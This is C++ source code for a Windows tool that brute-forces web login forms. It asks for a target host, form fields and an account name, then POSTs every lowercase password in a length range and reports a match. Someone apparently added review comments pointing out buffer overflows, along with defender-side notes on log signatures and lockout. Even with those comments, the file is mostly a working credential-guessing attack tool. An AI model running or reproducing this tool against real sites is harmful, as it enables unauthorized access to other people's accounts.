/*
**
** Brute Forcer Example Source Code
** UnnamedOne
** brian_denys@hotmail.com
** hxxp://xxx.remote-exploit.org
**
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <stdarg.h>
#include <iostream.h>
#pragma comment(lib, "ws2_32.lib")
// NOTE(review): neither macro is referenced anywhere in the visible source.
#define ijji "Avatar"
#define SkyGamers ""
// Socket for the current attempt: assigned by Connect(), read by guess() and chunk().
SOCKET Conn;
// Operator-supplied settings. main() fills these with `cin >>`, which applies no
// length limit, so input longer than the array writes past its end.
char URL[256]; // target host name (also used to build the Referer header)
char Path[256]; // request path the form is POSTed to
char UserVar[256]; // name of the form field carrying the user name
char PassVar[256]; // name of the form field carrying the password
char Username[32]; // account name submitted with every candidate
// Candidate alphabet: lowercase ASCII letters only.
char def_charset[] = "abcdefghijklmnopqrstuvwxyz";
// Per-position charset index of the current candidate. Shared by chunk(),
// increment() and finished(); 128 entries, the same size as block[] in chunk().
unsigned int inc[128];
// Prototypes
// Connect, send, etc..
int Connect(char* szIP, int szPort);
int guess(char* szUser, char* szPass);
int remotePOST(SOCKET m_sConnection, CHAR* m_cHost, CHAR* m_cPath, CHAR* m_cData, CHAR* m_cReferer, CHAR* m_cCookies);
int End(SOCKET s);
// Brute Force Algorithm Functions
int finished(char *block, char *charset, char *templ);
void increment(char *block, int len, char *charset, char *templ);
void chunk(int start, int end, char *charset, char *templ, char *startblock);
int StartBrute(int min, int max);
// Entry point: prompts for the host, path, form field names, account name and
// candidate length range, then hands the range to StartBrute().
//
// NOTE(review): every `cin >>` into a char array below is unbounded; the
// destinations are 256 bytes (32 for Username), so a longer token overflows
// the global it is read into.
// NOTE(review): min and max are not range-checked here, yet chunk() uses the
// length to index block[128] and inc[128].
int main()
{
int min, max;
cout << "Enter URL of target witout hxxp:// (Ex. xxx.targethost.com)" << endl;
cin >> URL;
cout << "Enter Path (Ex. /index.php)" << endl;
cin >> Path;
cout << "Username variable (Ex. vBulletin_username)" << endl;
cin >> UserVar;
cout << "Password variable (Ex. vBulletin_password)" << endl;
cin >> PassVar;
cout << "Target Username (Ex. Asshole)" << endl;
cin >> Username;
cout << "Minimum characters?" << endl;
cin >> min;
cout << "Maximum characters?" << endl;
cin >> max;
// The return value of StartBrute() is ignored; main always exits with 0.
StartBrute(min,max);
return 0;
}
// Initialises Winsock, resolves szIP with gethostbyname() and opens a TCP
// connection to szPort. On success the socket is stored in the global Conn and
// also returned; on failure the function prints a message and returns 1.
//
// NOTE(review): the failure value 1 and a socket handle share the same int
// return channel, and the callers in chunk() ignore the return value anyway,
// so a failed connect leaves Conn holding whatever it held before.
int Connect(char* szIP, int szPort)
{
WSADATA wsaData;
int iResult;
SOCKET ConnectSocket;
sockaddr_in clientService;
struct hostent* m_hHost;
// Winsock 2.2 is requested on every call; End() issues the matching WSACleanup().
iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
// NOTE(review): a WSAStartup failure is only reported; execution continues.
if(iResult != NO_ERROR)
printf("Error at WSAStartup()\n");
ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(ConnectSocket == INVALID_SOCKET)
{
printf("Error at socket(): %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
// NOTE(review): the gethostbyname() result is dereferenced below without a
// NULL check, so a failed lookup is a null-pointer dereference.
m_hHost = gethostbyname(szIP);
memset( &clientService, 0, sizeof clientService );
clientService.sin_family = AF_INET;
clientService.sin_addr = *(struct in_addr *)m_hHost->h_addr;
clientService.sin_port = htons(szPort);
if(connect(ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService)) == SOCKET_ERROR)
{
// NOTE(review): ConnectSocket is not closed on this path.
printf( "Failed to connect.\n" );
WSACleanup();
return 1;
}
else
{
//printf("Connected to %s:%d\n", m_hHost->h_name, szPort);
}
Conn = ConnectSocket;
return ConnectSocket;
}
// Submits one user name / password pair over the global Conn socket and
// inspects the reply.
//
// The form body is "<UserVar>=<szUser>&<PassVar>=<szPass>", sent through
// remotePOST() with no cookies and a Referer built from URL. The first recv()
// is printed and searched for the substring "changed"; if present, szPass is
// shown in a message box and the process exits. Otherwise 0 is returned.
//
// Defender-side view: every attempt is an identical-looking POST to the same
// path for the same account name, differing only in the password field.
//
// NOTE(review): none of the three malloc() results is checked or freed.
// NOTE(review): both sprintf() calls write into 256-byte buffers with no
// length bound, and the values are not URL-encoded.
int guess(char* szUser, char* szPass)
{
int iResult;
int recvbuflen = 800096;
char* recvbuf = (char*)malloc(800096);
char* hxxpURL = (char*)malloc(256);
sprintf(hxxpURL, "hxxp://%s",URL);
char* vars = (char*)malloc(256);
sprintf(vars, "%s=%s&%s=%s",UserVar, szUser, PassVar, szPass);
remotePOST(Conn, URL, Path, vars, hxxpURL, NULL);
// Only a single recv() is issued; whatever part of the reply arrives in it
// is all that gets examined.
iResult = recv(Conn, recvbuf, recvbuflen, 0);
// NOTE(review): iResult is used as an index unchecked. A recv() error (-1)
// writes before the buffer, and a full-length read writes one byte past it.
recvbuf[iResult] = 0x00;
printf("%s",recvbuf);
// The match marker is a fixed, site-specific substring of the response body.
char* strip = strstr(recvbuf, (const char*)"changed");
//printf("%s\n",strip);
if(strip != NULL){
MessageBox(NULL,szPass,"Found!",MB_OK);
ExitProcess(0);
}
// NOTE(review): recvbuf is a pointer, so sizeof(recvbuf) is the pointer size,
// not 800096; only the first few bytes are cleared.
memset(recvbuf,0,sizeof(recvbuf));
return 0;
}
// Writes one form POST to m_sConnection in four send() calls: the request
// line plus fixed headers, the Content-Type header, the Content-Length header
// followed by the blank line, and finally the body m_cData. A Cookie header is
// included only when m_cCookies is non-NULL. Returns the result of the last
// send() that was attempted.
//
// Defender-side view: the header set is constant across requests. The
// User-Agent string, "Keep-Alive: 300" and "Connection: keep-alive" are
// hard-coded, and the Referer is supplied by the caller. That gives web or
// proxy logs a stable signature to match.
//
// NOTE(review): the malloc() results are not checked, and sprintf() writes the
// request head into the 2096-byte buffer with no length bound.
int remotePOST(SOCKET m_sConnection, CHAR* m_cHost, CHAR* m_cPath, CHAR* m_cData, CHAR* m_cReferer, CHAR* m_cCookies)
{
CHAR* m_cCompleteBuffer = (CHAR*)malloc(2096);
// The two branches differ only in the trailing Cookie header.
if(m_cCookies)
{
sprintf(m_cCompleteBuffer,
"POST %s "
"HXXP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n"
"Referer: %s\r\n"
"Keep-Alive: 300\r\n"
"Connection: keep-alive\r\n"
"Cookie: %s\r\n"
,m_cPath
,m_cHost
,m_cReferer
,m_cCookies);
}
else
{
sprintf(m_cCompleteBuffer,
"POST %s "
"HXXP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n"
"Referer: %s\r\n"
"Keep-Alive: 300\r\n"
"Connection: keep-alive\r\n"
,m_cPath
,m_cHost
,m_cReferer);
}
// m_cDummy points at a string literal and is therefore not freed below.
CHAR* m_cDummy = "Content-Type: application/x-www-form-urlencoded\r\n";
CHAR* m_cDummy2 = (CHAR*)malloc(128);
INT m_iLength = strlen(m_cData);
// The second "\r\n" ends the header section; the body follows.
sprintf(m_cDummy2,"Content-Length: %i\r\n\r\n",m_iLength);
INT m_iReturn = send(m_sConnection,m_cCompleteBuffer,strlen(m_cCompleteBuffer),0);
// NOTE(review): each `if(m_iReturn)` treats any non-zero value as success,
// which includes SOCKET_ERROR (-1). A failed send() does not stop the chain.
if(m_iReturn)
{
m_iReturn = send(m_sConnection,m_cDummy,strlen(m_cDummy),0);
if(m_iReturn)
{
m_iReturn = send(m_sConnection,m_cDummy2,strlen(m_cDummy2),0);
if(m_iReturn)
{
m_iReturn = send(m_sConnection,m_cData,strlen(m_cData),0);
if(m_iReturn)
{
free(m_cDummy2);
free(m_cCompleteBuffer);
return m_iReturn;
}
}
}
}
// Common exit for every path that did not return above.
free(m_cDummy2);
free(m_cCompleteBuffer);
return m_iReturn;
}
// Tears down one connection: half-closes the sending side, closes the socket,
// and calls WSACleanup() to balance the WSAStartup() made in Connect().
// Always returns 1; the results of the three calls are not checked.
int End(SOCKET s)
{
shutdown(s, SD_SEND);
closesocket(s);
WSACleanup();
return 1;
}
// Brute Force Algoritm Functions
// hxxp://darkc0de.com/c0de/c/crunch.txt
/*
 * Reports whether `block` is the last candidate of its length.
 *
 * Returns TRUE when every varying position has reached the final index of
 * `charset` (tracked in the global inc[]), and FALSE otherwise. With an empty
 * template every position varies. With a template only positions marked '@'
 * are considered.
 */
int finished(char *block, char *charset, char *templ)
{
    const size_t width = strlen(block);
    const size_t last = strlen(charset) - 1;
    const int use_template = (templ[0] != 0);
    size_t pos;

    for (pos = 0; pos < width; pos++)
    {
        /* Fixed template positions never advance, so they cannot block completion. */
        if (use_template && templ[pos] != '@')
            continue;
        if (inc[pos] < last)
            return FALSE;
    }
    return TRUE;
}
/*
 * Advances `block` to the next candidate, odometer style.
 *
 * Works from the rightmost character to the left. The first varying position
 * that is not yet at the end of `charset` is stepped forward and the walk
 * stops. Positions already at the end wrap back to charset[0] and the carry
 * continues leftwards. With a non-empty template only '@' positions vary.
 * The per-position indices live in the global inc[]. `len` is unused.
 */
void increment(char *block, int len, char *charset, char *templ)
{
    const size_t last = strlen(charset) - 1;
    int pos = (int)(strlen(block) - 1);

    while (pos > -1)
    {
        if (templ[0] == 0 || templ[pos] == '@')
        {
            if (inc[pos] < last)
            {
                /* No carry needed: step this position and finish. */
                inc[pos]++;
                block[pos] = charset[inc[pos]];
                break;
            }
            /* Wrap this position and carry into the one to its left. */
            block[pos] = charset[0];
            inc[pos] = 0;
        }
        pos--;
    }
}
// Enumerates every candidate of length start..end over `charset` and submits
// each one for the global Username.
//
// For each length the first candidate is built from charset[0] (or from the
// template / startblock when those are non-empty), then increment() is applied
// until finished() reports the last candidate. Every candidate goes through a
// full Connect(URL, 80) / guess() / End() cycle, so each attempt is its own TCP
// connection to port 80, issued one at a time in charset order.
//
// Defender-side view: the traffic is a strictly sequential run of failed
// logins against one account name. Per-account failure counting, throttling or
// lockout on the server limits how much of this keyspace can be covered.
//
// NOTE(review): block[] and the global inc[] hold 128 entries, but the length
// i is never checked against that bound before being used as the fill limit.
void chunk(int start, int end, char *charset, char *templ, char *startblock)
{
int i,j,k,t;
char block[128];
if(end-start <0) return;
// t == 1 when a template is in use, 0 otherwise.
if(templ[0]==0) t=0;
else t=1;
for(i=start;i<=end;i++)
{
memset(block,0,sizeof(block));
// Build the first candidate of length i and the matching inc[] state.
for(j=0;j<i;j++)
{
if(startblock[0]==0)
{
if(t==0)
{
block[j] = charset[0];
inc[j] = 0;
}
else
{
if(templ[j]=='@')
{
block[j] = charset[0];
inc[j] = 0;
}
else block[j] = templ[j];
}
}
else
{
// Resume from startblock: copy the character and look up its charset
// index. inc[j] is left unchanged if the character is not in charset.
block[j] = startblock[j];
for(k=0;k<strlen(charset);k++)
if(block[j]==charset[k]) inc[j] = k;
}
}
// First candidate of this length. Return values of Connect() and guess()
// are ignored.
printf("Trying: %s\n",block);
Connect(URL, 80);
guess(Username, block);
End(Conn);
// Remaining candidates of this length.
while(!finished(block,charset,templ))
{
increment(block,i,charset,templ);
printf("Trying: %s\n",block);
Connect(URL, 80);
guess(Username, block);
End(Conn);
}
}
}
// Sets up the enumeration and runs it: copies def_charset into a local
// charset buffer, leaves the template and start block empty, and calls chunk()
// for lengths min..max. Always returns 1.
int StartBrute(int min, int max)
{
char charset[256];
char templ[256];
char startblock[256];
memset(charset,0,sizeof(charset));
// Empty templ and startblock make chunk() vary every position and start
// each length from charset[0].
memset(templ,0,sizeof(templ));
memset(startblock,0,sizeof(startblock));
// strncpy() with n == strlen(src) copies no terminator; the string is
// NUL-terminated only because charset was zeroed above.
strncpy(charset,def_charset,strlen(def_charset));
chunk(min,max,charset,templ,startblock);
return 1;
}